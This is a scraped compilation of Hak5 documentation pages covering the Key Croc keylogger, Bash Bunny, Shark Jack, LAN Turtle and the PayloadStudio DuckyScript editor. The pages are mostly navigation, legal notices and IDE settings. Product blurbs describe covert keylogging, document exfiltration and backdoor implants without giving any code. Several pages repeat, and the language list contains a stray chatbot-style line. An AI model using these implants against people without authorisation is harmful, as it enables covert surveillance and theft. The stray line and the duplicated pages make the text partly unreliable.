* [The LED Command](https://docs.hak5.org/packet-squirrel/payload-development/the-led-command/)
* [The SWITCH Command](https://docs.hak5.org/packet-squirrel/payload-development/the-switch-command/)
* [The BUTTON Command](https://docs.hak5.org/packet-squirrel/payload-development/the-button-command/)
* [Included Tools](https://docs.hak5.org/packet-squirrel/payload-development/included-tools/)
Troubleshooting [_link_](https://docs.hak5.org/packet-squirrel/#troubleshooting)
---------------------------------------------------------------------------------
* [Firmware Recovery](https://docs.hak5.org/packet-squirrel/troubleshooting/firmware-recovery/)
* [Factory Reset](https://docs.hak5.org/packet-squirrel/troubleshooting/factory-reset/)
* [FAQ](https://docs.hak5.org/packet-squirrel/troubleshooting/faq/)
* * *
[Packet Squirrel Basics _navigate\_next_](https://docs.hak5.org/packet-squirrel/getting-started/packet-squirrel-basics/)
---
# Keycroc by Hak5 | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Keycroc by Hak5
===============
The Key Croc is a smart keylogger and pentest implant featuring a pattern matching payload system and remote management capabilities. This documentation covers the basics of operation and deployment, accessing the Linux shell for advanced operations, Internet connectivity, software updates and payload development.

Key Croc
warning
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
Specifications [_link_](https://docs.hak5.org/key-croc/#specifications)
------------------------------------------------------------------------
INTERFACE: USB
STANDARDS: USB 2.0
FREQUENCY RANGE: 2.412 ~ 2.4835 GHz
SIZE: 74 x 27 x 14 mm
POWER: 5W (USB 5V 1A)
OPERATING TEMPERATURE: 35ºC ~ 45ºC
STORAGE TEMPERATURE: -20ºC ~ 50ºC
RELATIVE HUMIDITY: 0% to 90% (noncondensing)
Important Safety Information and Warnings [_link_](https://docs.hak5.org/key-croc/#important-safety-information-and-warnings)
------------------------------------------------------------------------------------------------------------------------------
Your device may get hot to the touch; this is normal. Unplug the device and let it cool before removing it. This device complies with applicable surface temperature standards and limits defined by the International Standard for Safety (IEC 60950-1). Still, sustained contact with warm surfaces for long periods of time may cause discomfort or injury. Keep the device in a well-ventilated area when in use. Allow for adequate air circulation under and around the device. Do not expose the device to water or extreme conditions (moisture, heat, cold, dust), as the device may malfunction or cease to work when exposed to such elements. Do not attempt to disassemble or repair the device yourself. Doing so voids the limited warranty and could harm you or the device. This device is not designed, manufactured or intended for use in hazardous environments requiring fail-safe performance in which the failure of the device could lead directly to death, personal injury, or severe physical or environmental damage.
The Key Croc is a network administration and pentesting tool for authorized auditing and security analysis purposes only where permitted subject local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use. © Hak5 LLC.
This device complies with Part 15 of the FCC Rules. Operation is subject to the following two conditions: (1) this device may not cause harmful interference, and (2) this device must accept any interference received, including interference that may cause undesired operation. Warning (Part 15.21) Changes or modifications not expressly approved by the party responsible for compliance could void the user’s authority to operate the equipment. RF Exposure (OET Bulletin 65) To comply with FCC RF exposure requirements for mobile transmitting devices, this transmitter should only be used or installed at locations where there is at least 20cm separation distance between the antenna and all persons. Information to the User - Part 15.105 (b) Note: This equipment has been tested and found to comply with the limits for a Class B digital device, pursuant to part 15 of the FCC Rules. These limits are designed to provide reasonable protection against harmful interference in a residential installation. This equipment generates, uses and can radiate radio frequency energy and, if not installed and used in accordance with the instructions, may cause harmful interference to radio communications. However, there is no guarantee that interference will not occur in a particular installation. If this equipment does cause harmful interference to radio or television reception, which can be determined by turning the equipment off and on, the user is encouraged to try to correct the interference by one or more of the following measures: \* Reorient or relocate the receiving antenna. \* Increase the separation between the equipment and receiver. \* Connect the equipment into an outlet on a circuit different from that to which the receiver is connected. \* Consult the dealer or an experienced radio/TV technician for help.
Key Croc is a trademark of Hak5 LLC. This product is packaged with a limited warranty, the acceptance of which is a condition of sale. See Hak5.org for additional warranty details and limitations. Availability and performance of certain features, services and applications are device and network dependent and may not be available in all areas; additional terms, conditions and/or charges may apply. All features, functionality and other product specifications are subject to change without notice or obligation. Hak5 LLC reserves the right to make changes to the products description in this document without notice. Hak5 LLC does not assume any liability that may occur due to the use or application of the product(s) described herein. Made in China. Designed in San Francisco by Hak5 LLC, 548 Market Street, #39371, San Francisco, CA, 94104.
* * *
[Key Croc Basics _navigate\_next_](https://docs.hak5.org/key-croc/basics/key-croc-basics/)
---
# Bash Bunny by Hak5 | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Bash Bunny by Hak5
==================
By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.

Bash Bunny Mark II (SD)
info
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
* * *
[Switch Positions _navigate\_next_](https://docs.hak5.org/bash-bunny/getting-started/switch-positions/)
---
# PayloadStudio | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
PayloadStudio
=============
* * *
Unleash your hacking creativity with the official DuckyScript™ editor [_link_](https://docs.hak5.org/payload-studio#unleash-your-hacking-creativity-with-the-official-duckyscript-editor)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

info
Shop: [https://hak5.org/products/payload-studio-pro](https://hak5.org/products/payload-studio-pro)
[OPEN PAYLOADSTUDIO IN BROWSER](https://payloadstudio.hak5.org/)
[_link_](https://docs.hak5.org/payload-studio#x20----------------------------open-payloadstudio-in-browser)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
This guide will cover usage of
* PayloadStudio Community Edition (Free)
* PayloadStudio .png)
Take your DuckyScript™ payloads to the next level with this full-featured, browser-based development environment.
PayloadStudio features all of the conveniences of a modern IDE, **right from your browser**. building payloads for Hak5 hotplug tools has never been easier!
From syntax highlighting and auto-completion

Autocomplete and Snippets
to live error-checking and built in EXTENSIONs—

Include extensions directly from autocomplete!

Errors, warnings, info, and tips!
Getting Started [_link_](https://docs.hak5.org/payload-studio#getting-started)
-------------------------------------------------------------------------------
* [Overview](https://docs.hak5.org/payload-studio/getting-started/overview/)
* [Getting Started](https://docs.hak5.org/payload-studio/getting-started/getting-started/)
* [Editing Basics](https://docs.hak5.org/payload-studio/getting-started/editing-basics/)
* [FAQ](https://docs.hak5.org/payload-studio/getting-started/faq/)
Customization [_link_](https://docs.hak5.org/payload-studio#customization)
---------------------------------------------------------------------------
* [Appearance](https://docs.hak5.org/payload-studio/customization/appearance/)
* [Keyboard Shortcuts](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/)
* [IDE Settings](https://docs.hak5.org/payload-studio/customization/ide-settings/)
* [Editor Settings](https://docs.hak5.org/payload-studio/customization/editor-settings/)
* [Compiler Settings](https://docs.hak5.org/payload-studio/customization/compiler-settings/)
* * *
[Overview _navigate\_next_](https://docs.hak5.org/payload-studio/getting-started/overview/)
---
# Shark Jack by Hak5 | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Shark Jack by Hak5
==================
A portable network attack and automation tool for pentesters and systems administrators designed to enable social engineering engagements and opportunistic wired network auditing.
This documentation covers the basics of operation and deployment, accessing the Linux shell for advanced operations, Internet connectivity, software updates and payload development.

}}
warning
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
* [The Shark Jack by Hak5](https://docs.hak5.org/shark-jack/README.md)
Getting Started [_link_](https://docs.hak5.org/shark-jack/#getting-started)
----------------------------------------------------------------------------
* [Shark Jack Basics](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/)
* [Default Settings](https://docs.hak5.org/shark-jack/getting-started/default-settings/)
Beginner Guides [_link_](https://docs.hak5.org/shark-jack/#beginner-guides)
----------------------------------------------------------------------------
* [Unboxing and Setup](https://docs.hak5.org/shark-jack/beginner-guides/unboxing-and-setup/)
* [Using sharkjack.sh](https://docs.hak5.org/shark-jack/beginner-guides/using-sharkjack.sh/)
* [Two Key Commands](https://docs.hak5.org/shark-jack/beginner-guides/two-key-commands/)
* [Writing a Simple Payload](https://docs.hak5.org/shark-jack/beginner-guides/writing-a-simple-payload/)
Software Updates [_link_](https://docs.hak5.org/shark-jack/#software-updates)
------------------------------------------------------------------------------
* [Manual Upgrade](https://docs.hak5.org/shark-jack/software-updates/manual-upgrade/)
* [Over-the-Air Upgrade](https://docs.hak5.org/shark-jack/software-updates/over-the-air-upgrade/)
Writing Payloads [_link_](https://docs.hak5.org/shark-jack/#writing-payloads)
------------------------------------------------------------------------------
* [Payload Development Basics](https://docs.hak5.org/shark-jack/writing-payloads/payload-development-basics/)
* [The NETMODE Command](https://docs.hak5.org/shark-jack/writing-payloads/the-netmode-command/)
* [The LED Command](https://docs.hak5.org/shark-jack/writing-payloads/the-led-command/)
* [The SWITCH Command](https://docs.hak5.org/shark-jack/writing-payloads/the-switch-command/)
* [The BATTERY Command](https://docs.hak5.org/shark-jack/writing-payloads/the-battery-command/)
* [The SERIAL\_WRITE Command](https://docs.hak5.org/shark-jack/writing-payloads/the-serial_write-command/)
* [The Cloud C2 commands](https://docs.hak5.org/shark-jack/writing-payloads/the-cloud-c2-commands/)
* [Included Tools](https://docs.hak5.org/shark-jack/writing-payloads/included-tools/)
Managing Payloads [_link_](https://docs.hak5.org/shark-jack/#managing-payloads)
--------------------------------------------------------------------------------
* [The UPDATE\_PAYLOADS Command](https://docs.hak5.org/shark-jack/managing-payloads/the-update_payloads-command/)
* [The LIST Command](https://docs.hak5.org/shark-jack/managing-payloads/the-list-command/)
* [The ACTIVATE Command](https://docs.hak5.org/shark-jack/managing-payloads/the-activate-command/)
Troubleshooting [_link_](https://docs.hak5.org/shark-jack/#troubleshooting)
----------------------------------------------------------------------------
* [Firmware Recovery](https://docs.hak5.org/shark-jack/troubleshooting/firmware-recovery/)
Tips & Tricks [_link_](https://docs.hak5.org/shark-jack/#tips--tricks)
-----------------------------------------------------------------------
* [Charge the Shark Jack from your Phone](https://docs.hak5.org/shark-jack/tips-and-tricks/charge-the-shark-jack-from-your-phone/)
* [Using the Shark Jack with the Plunder Bug as a simple switch](https://docs.hak5.org/shark-jack/tips-and-tricks/using-the-shark-jack-with-the-plunder-bug-as-a-simple-switch/)
* [Android Serial Setup for Shark Jack Cable](https://docs.hak5.org/shark-jack/tips-and-tricks/android-serial-setup-for-shark-jack-cable/)
Product Information [_link_](https://docs.hak5.org/shark-jack/#product-information)
------------------------------------------------------------------------------------
* [Specifications](https://docs.hak5.org/shark-jack/product-information/specifications/)
* [Important Safety Information and Warnings](https://docs.hak5.org/shark-jack/product-information/important-safety-information-and-warnings/)
* * *
[Shark Jack Basics _navigate\_next_](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/)
---
# Bash Bunny by Hak5 | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Bash Bunny by Hak5
==================
By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.

Bash Bunny Mark II (SD)
info
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
* * *
[Switch Positions _navigate\_next_](https://docs.hak5.org/bash-bunny/getting-started/switch-positions/)
---
# PayloadStudio | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
PayloadStudio
=============
* * *
Unleash your hacking creativity with the official DuckyScript™ editor [_link_](https://docs.hak5.org/payload-studio/payloadstudio/#unleash-your-hacking-creativity-with-the-official-duckyscript-editor)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

info
Shop: [https://hak5.org/products/payload-studio-pro](https://hak5.org/products/payload-studio-pro)
[OPEN PAYLOADSTUDIO IN BROWSER](https://payloadstudio.hak5.org/)
[_link_](https://docs.hak5.org/payload-studio/payloadstudio/#x20----------------------------open-payloadstudio-in-browser)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
This guide will cover usage of
* PayloadStudio Community Edition (Free)
* PayloadStudio .png)
Take your DuckyScript™ payloads to the next level with this full-featured, browser-based development environment.
PayloadStudio features all of the conveniences of a modern IDE, **right from your browser**. building payloads for Hak5 hotplug tools has never been easier!
From syntax highlighting and auto-completion

Autocomplete and Snippets
to live error-checking and built in EXTENSIONs—

Include extensions directly from autocomplete!

Errors, warnings, info, and tips!
Getting Started [_link_](https://docs.hak5.org/payload-studio/payloadstudio/#getting-started)
----------------------------------------------------------------------------------------------
* [Overview](https://docs.hak5.org/payload-studio/getting-started/overview/)
* [Getting Started](https://docs.hak5.org/payload-studio/getting-started/getting-started/)
* [Editing Basics](https://docs.hak5.org/payload-studio/getting-started/editing-basics/)
* [FAQ](https://docs.hak5.org/payload-studio/getting-started/faq/)
Customization [_link_](https://docs.hak5.org/payload-studio/payloadstudio/#customization)
------------------------------------------------------------------------------------------
* [Appearance](https://docs.hak5.org/payload-studio/customization/appearance/)
* [Keyboard Shortcuts](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/)
* [IDE Settings](https://docs.hak5.org/payload-studio/customization/ide-settings/)
* [Editor Settings](https://docs.hak5.org/payload-studio/customization/editor-settings/)
* [Compiler Settings](https://docs.hak5.org/payload-studio/customization/compiler-settings/)
* * *
[Overview _navigate\_next_](https://docs.hak5.org/payload-studio/getting-started/overview/)
---
# LAN Turtle by Hak5 | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
LAN Turtle by Hak5
==================
USB Ethernet adapters with covert backdoors. These seemingly innocent USB Ethernet adapters are discreet remote access toolkits and man-in-the-middles for penetration testers and systems administrators.

warning
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
* * *
[LAN Turtle Basics _navigate\_next_](https://docs.hak5.org/lan-turtle/getting-started/lan-turtle-basics/)
---
# Getting Started | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Getting Started
===============
TL;DR Overview [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#tldr-overview)
-------------------------------------------------------------------------------------------------------------

PayloadStudio Overview
info
Upon logging in for the first time PayloadStudio will take you on a tour; you can relaunch the tour under **Help** > **Product Tour** at any time for a refresher!

Help > Product Tour
Menu Bar [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#menu-bar)
--------------------------------------------------------------------------------------------------
Access various features and settings of PayloadStudio. Clicking one will toggle the menu open/closed.

PayloadStudio Menu bar (Top Left)
### File Menu [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#file-menu)

File menu from the Menu Bar
### Import or Open Payloads [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#import-or-open-payloads)
Don’t know where to start on your payload writing journey? Open Examples, import via URL or even upload from local files directly into the editor!

Open / Import payload modal
Resources [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#resources)
----------------------------------------------------------------------------------------------------
Links directly to relevant repositories, Hak5 PayloadHub, Shop and Community.

PayloadStudio Resources (Top Right)

PayloadStudio Payload Editor
Compile / Deploy [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#compile---deploy)
------------------------------------------------------------------------------------------------------------------
Compile your DuckyScript payloads, or, for other device modes, save your payload.

PayloadStudio Generate Payload / Save Payload button
info
[Read More](https://docs.hak5.org/payload-studio/getting-started/editing-basics/)
about devices and deploying payloads
Console [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#console)
------------------------------------------------------------------------------------------------
PayloadStudio will use this as a location to tell you **important info.** It’s also used for DuckyScript Debugging/Breakpoints. Errors, messages, and status updates will appear here. Hide the console to keep it out of the way while building your payload or open it for an easy notepad-like environment to test your keystroke injection in! No more juggling multiple windows!
info
The console can be used to **test** parts of your payload, _it’s also a convenient text editor with the ability to Edit, Save, Clear, and toggle Open with ease._

PayloadStudio Console
### Open the Console [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#open-the-console)

Console toggle button (Bottom Right)

Open the Console button
### Minimize the console [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#minimize-the-console)

Minimize the console button
info
ESC / Escape will also minimize the console if it is open in the default keybinding mode
Help menu [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#help-menu)
----------------------------------------------------------------------------------------------------
Here you can find links to more detailed documentation (here 👋) as well as other useful info
* Documentation
* Quick Reference
* [Show Keybinds](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/)
* Relaunch Product Tour

Session Status bar
### Info, warning and error counts [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#info-warning-and-error-counts)
Info, warning and error counts are only used in USB Rubber Ducky mode

Info, warning and error counts
info
Clicking one of the Info, warning and error indicators will step through them in your editor.
### Current DUCKY\_LANG [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#current-ducky_lang)
DUCKY\_LANG is only used in USB Rubber Ducky mode

Info, warning and error counts
info
Clicking the language by default will bring you to [Compiler Settings](https://docs.hak5.org/payload-studio/customization/compiler-settings/)
to change your [DUCKY\_LANG](https://docs.hak5.org/payload-studio/customization/compiler-settings/#ducky_lang)
### Editing / Read Only mode indicator and toggle [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#editing--read-only-mode-indicator-and-toggle)
info
Toggle editor from Read Only to Editing by clicking the label or icon pinned to the top right above the editor

Read Only Mode

Editing Mode
### Session Save Status [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#session-save-status)
info
Auto save status is indicated at the top right of the editor.
.png)
**Unsaved**
.png)
**Saved**
Change Editor Modes by clicking the device name or logo, and view + edit your current payload filename

Breadcrumbs
### Payload Name [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#payload-name)
Ready to export your payload source code? Naming it will help keep you organized. Change the name of your payload by double clicking the current payload name from the top left of the editor.

Edit payload name
### Device / Editing mode [_link_](https://docs.hak5.org/payload-studio/getting-started/getting-started/#device--editing-mode)
Changing editor modes is as easy as two clicks!
1. Click the current device from the top left of the editor
2. Choose a new device mode from the Device Picker Menu

Change editor mode

PayloadStudio Device Picker
info
[Read More](https://docs.hak5.org/payload-studio/getting-started/editing-basics/)
about devices and deploying payloads
* * *
[_navigate\_before_ Overview](https://docs.hak5.org/payload-studio/getting-started/overview/)
[Editing Basics _navigate\_next_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/)
---
# Faq | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Faq
===
warning
Got a question these docs **don’t** answer? [Hop in the discord](https://hak5.org/discord)
and ask the **#payloadstudio** channel
Do I have to buy Pro to use my new USB Rubber Ducky? [_link_](https://docs.hak5.org/payload-studio/getting-started/faq/#do-i-have-to-buy-pro-to-use-my-new-usb-rubber-ducky)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
**Nope!** Community edition is _everything you will need to compile working payloads._ Pro offers tons of convenience and customization features - but is **not required** to get the job done.
Can I use PayloadStudio if I have an original USB Rubber Ducky to write DuckyScript v1? [_link_](https://docs.hak5.org/payload-studio/getting-started/faq/#can-i-use-payloadstudio-if-i-have-an-original-usb-rubber-ducky-to-write-duckyscript-v1)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Yes! PayloadStudio has taken over as _the_ DuckyScript compiler for all Hak5 Devices - past and present. PayloadStudio has built in Version detection

PayloadStudio Compiler Output - Detected DuckyScript Version 3.0

PayloadStudio Compiler Output - Detected DuckyScript Version 1.0
info
**Only** have an original USB Rubber Ducky? no problem! PayloadStudio Pro offers compiler options to **lock payloads into DuckyScript 1.0** - _that way you never have to worry about using or writing incompatible payloads ever again!_ .png)
[_Read more about Compiler Settings_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#lock-compiler-version-to-duckyscript-version-1.0)

Incompatible DuckyScript 1.0 Syntax Errror annotation
* * *
[_navigate\_before_ Editing Basics](https://docs.hak5.org/payload-studio/getting-started/editing-basics/)
[Appearance _navigate\_next_](https://docs.hak5.org/payload-studio/customization/appearance/)
---
# IDE Settings | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
IDE Settings
============
report
Some options are limited to PayloadStudio Pro. These will be indicated with the .png) label.
check\_circle
Even though each setting is named to be self explanatory - every setting in PayloadStudio contains an description / explanation tool-tip available **on hover**

Setting description tool-tip
IDE Settings [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#ide-settings)
-----------------------------------------------------------------------------------------------------
### `Theme` [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#theme)
The Theme option will change both the main editor and the overall appearance of PayloadStudio
### `Console Theme` [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#console-theme)
The Console Theme will change the appearance of the console and other editors (like the Language Editor) within PayloadStudio
info
See the [Appearance](https://docs.hak5.org/payload-studio/customization/appearance/)
page
### `Auto Save PayloadStudio Session` [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#auto-save-payloadstudio-session)
Checking this will store the editor session in your browser’s local storage.
info
Auto save status is indicated at the top right of the editor.
.png) Unsaved .png) Saved
You can always manually save your session from **File > Save Session**

File > Save Session
### `Auto Save Console Session` [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#auto-save-console-session)
With this option enabled, the contents of the Console will not persist across refreshes
### `Timestamp Console Messages` [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#timestamp-console-messages)
With this option enabled, messages that are added to the console by PayloadStudio will be timestamped

Timestamp console messages enabled
### `Open console automatically` [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#open-console-automatically)
With this option enabled, the Console will open when new text is written to it by PayloadStudio or the DuckyScript Compiler.
### `Enable Live Autocompletion` [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#enable-live-autocompletion)
Checking this enables live payload autocomplete. Start typing for filtered suggestions to automatically display below the cursor. ESC: close the popup. ARROW-KEYS: navigate dropdown. ENTER: select highlighted suggestion. CTRL-SPACE: open without typing anything.

Official Up-to-date Extension

Modified Official Extension

Unofficial Extension

Out-of-date Official Extension
### `Automatically add documentation template` [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#automatically-add-documentation-template)
Automatically add comment documentation template to new payloads

USB Rubber Ducky Documentation Template
### `Live DuckyScript Tips as inline Annotations` .png) [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#live-duckyscript-tips-as-inline-annotations)
Checking this enables tips curated from a decade of feedback, development and testing - this option should save you some headache explaining best practices or edge cases as live annotations

Live DuckyScript Tips Demo
[_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#)
----------------------------------------------------------------------------
### `Live DuckyScript Error Checking` .png) [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#live-duckyscript-error-checking)
Checking this enables error checking in real time. After making changes to your payload and 1s of inactivity has passed PayloadStudio will automatically check the current payload for compile errors.

Live DuckyScript Error Checking Demo
[_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#)
----------------------------------------------------------------------------
### `Display Quick Action Toolbar In Editor` .png) [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#display-quick-action-toolbar-in-editor)
Checking this will pin Edit shortcuts to the top of the Editor.
### `Display Sublime Scroller` .png) [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#display-sublime-scroller)
Checking this will enable a sublime inspired code navigation scroller in the Editor.

Sublime Scroller Enabled Demo
### `Enable Additional Language support` .png) [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#enable-additional-language-support)
Checking this will enable file extension based language support\\

Edit the file name using the desired file extension

Change modes prompt

PayloadStudio in C/C++ mode
Features per language mode may vary. Additional languages include:
Certainly! Here is the list of labels without the numbers:
* ABAP
* ABC
* ActionScript
* ADA
* Alda
* Apache Conf
* Apex
* AQL
* AsciiDoc
* ASL
* Assembly x86
* AutoHotkey / AutoIt
* BatchFile
* C and C++
* C9Search
* Cirru
* Clojure
* Cobol
* CoffeeScript
* ColdFusion
* Crystal
* C#
* Csound Document
* Csound
* Csound Score
* CSS
* Curly
* D
* Dart
* Diff
* Dockerfile
* Dot
* Drools
* Edifact
* Eiffel
* EJS
* Elixir
* Elm
* Erlang
* Forth
* Fortran
* FSharp
* FSL
* FreeMarker
* Gcode
* Gherkin
* Gitignore
* Glsl
* Gobstones
* Go
* GraphQLSchema
* Groovy
* HAML
* Handlebars
* Haskell
* Haskell Cabal
* haXe
* Hjson
* HTML
* HTML (Elixir)
* HTML (Ruby)
* INI
* Io
* Jack
* Jade
* Java
* JavaScript
* JSON
* JSON5
* JSONiq
* JSP
* JSSM
* JSX
* Julia
* Kotlin
* LaTeX
* Latte
* LESS
* Liquid
* Lisp
* LiveScript
* LogiQL
* LSL
* Lua
* LuaPage
* Lucene
* Makefile
* Markdown
* Mask
* MATLAB
* Maze
* MediaWiki
* MEL
* MIPS
* MIXAL
* MUSHCode
* MySQL
* Nginx
* Nim
* Nix
* NSIS
* Nunjucks
* Objective-C
* OCaml
* Pascal
* Perl
* pgSQL
* PHP
* PHP (Blade Template)
* Pig
* Powershell
* Praat
* Prisma
* Prolog
* Properties
* Protobuf
* Puppet
* Python
* QML
* R
* Raku
* Razor
* RDoc
* Red
* RHTML
* RST
* Ruby
* Rust
* SASS
* SCAD
* Scala
* Scheme
* Scrypt
* SCSS
* SH
* SJS
* Slim
* Smarty
* Smithy
* snippets
* Soy Template
* Space
* SQL
* SQLServer
* Stylus
* SVG
* Swift
* Tcl
* Terraform
* Tex
* Text
* Textile
* Toml
* TSX
* Twig
* Typescript
* Vala
* VBScript
* Velocity
* Verilog
* VHDL
* Visualforce
* Wollok
* XML
* XQuery
* YAML
* Zeek
* Django
### `PayloadStudio Debugging Mode` [_link_](https://docs.hak5.org/payload-studio/customization/ide-settings/#payloadstudio-debugging-mode)
Recommended Setting: Disabled (unchecked) - For use in bug reporting - may cause unstable performance. Enable this to enable PayloadStudio Debug logging in the browser console.
* * *
[_navigate\_before_ Keyboard Shortcuts](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/)
[Editor Settings _navigate\_next_](https://docs.hak5.org/payload-studio/customization/editor-settings/)
---
# Keyboard Shortcuts | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Keyboard Shortcuts
==================
Implementing some of the most common shortcuts, PayloadStudio’s keyboard shortcuts are designed to save you time!
PayloadStudio Pro takes this even further, supporting a variety of modes. VIM users can enjoy a full VIM keybinding experience right from the editor!
Other modes include EMACS, Sublime and VSCode!
info
Keybinding mode can be changed from within **Settings** > **Editor Settings** under the [**Keybindings**](https://docs.hak5.org/payload-studio/customization/editor-settings/#keybindings)
heading. .png)

Settings > Editor Settings > Keybindings
warning
Some keyboard shortcuts will not be accessible when the PayloadStudio is set to modes like VIM or EMACS

Help > Show Keybinds
info
View the Shortcuts list inside of PayloadStudio from the **Help** menu under **Show Keybinds**

Default Keybindings [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#default-keybindings)
-------------------------------------------------------------------------------------------------------------------------
### \[ Go to next error \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-next-error-x20)
Windows: Alt-E
Mac: F4
### \[ Go to previous error \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-previous-error-x20)
Windows: Alt-Shift-E
Mac: Shift-F4
### \[ Select all \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-all-x20)
Windows: Ctrl-A
Mac: Command-A
### \[ Go to line… \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-line-x20)
Windows: Ctrl-L
Mac: Command-L
### \[ Toggle fold widget \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-toggle-fold-widget-x20)
Windows: F2
Mac: F2
### \[ Toggle parent fold widget \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-toggle-parent-fold-widget-x20)
Windows: Alt-F2
Mac: Alt-F2
### \[ Fold other \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-fold-other-x20)
Windows: Alt-0
Mac: Command-Option-0
### \[ Unfold all \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-unfold-all-x20)
Windows: Alt-Shift-0
Mac: Command-Option-Shift-0
### \[ Find next \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-find-next-x20)
Windows: Ctrl-K
Mac: Command-G
### \[ Find previous \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-find-previous-x20)
Windows: Ctrl-Shift-K
Mac: Command-Shift-G
